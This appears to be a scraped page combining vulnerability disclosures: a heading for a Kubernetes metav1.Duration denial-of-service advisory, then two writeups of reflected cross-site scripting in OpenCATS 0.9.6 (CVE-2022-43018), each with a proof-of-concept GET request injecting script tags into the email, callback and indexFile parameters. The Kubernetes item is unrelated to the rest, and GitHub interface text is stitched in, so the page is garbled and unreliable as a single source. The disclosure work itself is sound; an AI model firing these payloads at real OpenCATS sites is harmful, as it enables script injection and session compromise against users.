**References**

*   GHSA-f4p5-x4vc-mh4v
*   kubernetes/apimachinery#131

GHSA-f4p5-x4vc-mh4v: Improper use of metav1.Duration allows for Denial of Service

OpenCATS v0.9.6 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the email parameter in the Check Email function.

Permalink

**1** contributor

**Users who have contributed to this file**

**Cross Site Scripting vulnerability in the OpenCats 'email' parameter of Check Email functionality**

OpenCats version 0.9.6 PHP7.2 suffers from reflected XSS vulnerability. This allows attackers arbitrary JavaScript injection, which compromises secure session between client and server.

**PoC**

    GET /index.php?m=toolbar&callback=<script>alert`xss`</script>&a=checkEmailIsInSystem&email=<script>alert(document.domain)</script>

CVE-2022-43018: opencats_zero-days/XSS_in_checkEmail.md at main · hansmach1ne/opencats_zero-days

OpenCATS v0.9.6 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the indexFile component.

Permalink

**Name already in use**

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

Go to file

*   Go to file

*   Copy path
*   Copy permalink

**1** contributor

**Users who have contributed to this file**

Cross Site Scripting vulnerability in the OpenCats 'indexFile'.

OpenCats version 0.9.6 PHP7.2 suffers from reflected XSS vulnerability. This allows attackers arbitrary JavaScript injection, which compromises secure session between client and server.

**PoC**

    GET //ajax.php?f=getPipelineJobOrder&joborderID=1&page=0&entriesPerPage=1&sortBy=dateCreatedInt&sortDirection=desc&indexFile=15)"></a><script>alert`xss`</script>&isPopup=0

Tag

#mac